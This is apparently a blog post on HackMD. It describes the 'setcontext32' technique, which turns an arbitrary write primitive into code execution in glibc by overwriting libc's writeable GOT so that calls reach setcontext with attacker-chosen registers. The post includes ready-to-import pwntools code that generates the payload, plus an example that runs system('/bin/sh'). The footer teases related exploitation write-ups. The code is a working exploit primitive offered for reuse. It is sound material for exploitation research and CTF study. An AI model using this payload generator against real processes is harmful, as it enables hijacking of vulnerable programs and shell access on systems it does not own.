# modern arb write -> rce is hard Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of `__free_hook` are long gone; now you've got to leak the ptr mangling cookie to modify an existing `__exit_funcs` entry, maybe compute the offset to `ld.so` to overwrite `l_addr` and create a fake `DT_FINI` entry, or perhaps setup special `_codecvt` and `_wide_data` structures on hijacked IO objects... I'd just like to specify the function I want to call and its arguments! I want a *flexible* RCE primitive. I don't want to rely on `_IO_cleanup`, `_dl_fini`, or `malloc` to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray `system` is stack aligned. I don't want to satisfy several constraints so `one_gadget` will work! # setcontext32 setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like: ```python= write(libc_write_address, flat( p64(0), p64(libc_write_address + 0x218) p64(setcontext+32), p64(libc_exe_address) * 0x40, cpu_state_information, )) ``` Where `libc_write_address` is the start of the writeable page in libc, `libc_exe_address` is the start of the executable page in libc, and `cpu_state_information` is a structure that contains all current registers, including `rsp` and `rip`. ## high level overview Every GOT entry in libc such as `memset`, `memcpy`, `strcpy`, and `strlen` is replaced with the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake linkmap, `libc_write_address + 0x218`, and calls a fake runtime resolver, `setcontext+32`, all of which starts at the beginning of the writeable page. `setcontext+32` pops `libc_write_address + 0x218` off the stack, and treats it as a pointer to a saved `ucontext_t`. It'll then load your structure as the current CPU state. Calling most libc functions will trigger setcontext32, including `malloc`, `exit`, and (almost?) every IO operation. ## why libc's GOT is writeable so that you may use architecture specific functions, such as `memcpy` optimized for SSE or AVX512. A friend also guessed that it could be for `ltrace`. I learned the libc GOT was writeable from pwndbg creator [disconnect3d](https://twitter.com/disconnect3d_pl). ## code Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below. `setcontext32.py` ```python= from pwn import * def create_ucontext( src: int, rsp=0, rbx=0, rbp=0, r12=0, r13=0, r14=0, r15=0, rsi=0, rdi=0, rcx=0, r8=0, r9=0, rdx=0, rip=0xDEADBEEF, ) -> bytearray: b = bytearray(0x200) b[0xE0:0xE8] = p64(src) # fldenv ptr b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr b[0xA0:0xA8] = p64(rsp) b[0x80:0x88] = p64(rbx) b[0x78:0x80] = p64(rbp) b[0x48:0x50] = p64(r12) b[0x50:0x58] = p64(r13) b[0x58:0x60] = p64(r14) b[0x60:0x68] = p64(r15) b[0xA8:0xB0] = p64(rip) # ret ptr b[0x70:0x78] = p64(rsi) b[0x68:0x70] = p64(rdi) b[0x98:0xA0] = p64(rcx) b[0x28:0x30] = p64(r8) b[0x30:0x38] = p64(r9) b[0x88:0x90] = p64(rdx) return b def setcontext32(libc: ELF, **kwargs) -> (int, bytes): got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT") plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr return got, flat( p64(0), p64(got + 0x218), p64(libc.symbols["setcontext"] + 32), p64(plt_trampoline) * 0x40, create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs), ) if __name__ == "__main__": libc = ELF("./libc.so.6") dest, payload = setcontext32.setcontext32( libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__() ) print(hex(dest), payload.hex()) ```
Last changed by  
Sammy Hajhamid
2825

Read more

issues in exit town

I’ve recently seen this post discussing and building on research stemming from google’s project zero’s looks into hacking exit().

2/26/2024
Nightmare: One Byte to ROP // Deep Dive Edition

Introduction In this write-up, we'll discuss how to go from one byte out-of-bounds write to a complete ROP chain without IO access and no brute force under extremely restrictive seccomp, without ever knowing ASLR base. Attacks on the GNU C library have been wide and thorough. Many of the complex surfaces in the library, such as malloc or IO, have been thoroughly deconstructed and analyzed to be utilized in exploit chains. However, one surface, the runtime loader, is yet to be brought into its full potential. rtld, as it's called, is rich with complexity and interesting gadgets for a variety of reasons. Background Let's go a little more in-depth on rtld. First, the runtime loader is provided by a shared library named ld.so bundled alongside libc.so. If you've ever seen a virtual memory map of a process, it's almost certain you'll see both ld.so and libc.so in there somewhere. The ubiquity of both makes them very valuable targets for exploitation. Another neat fact is libc.so and ld.so are consistently spaced in memory. They'll be at consistent offsets from each other! This is a byproduct of something known as mmap relativity, where pages allocated by mmap are usually adjacent, and if not, always at a relative offset. This will be useful later.

2/13/2022
Read more from Sammy Hajhamid
Published on HackMD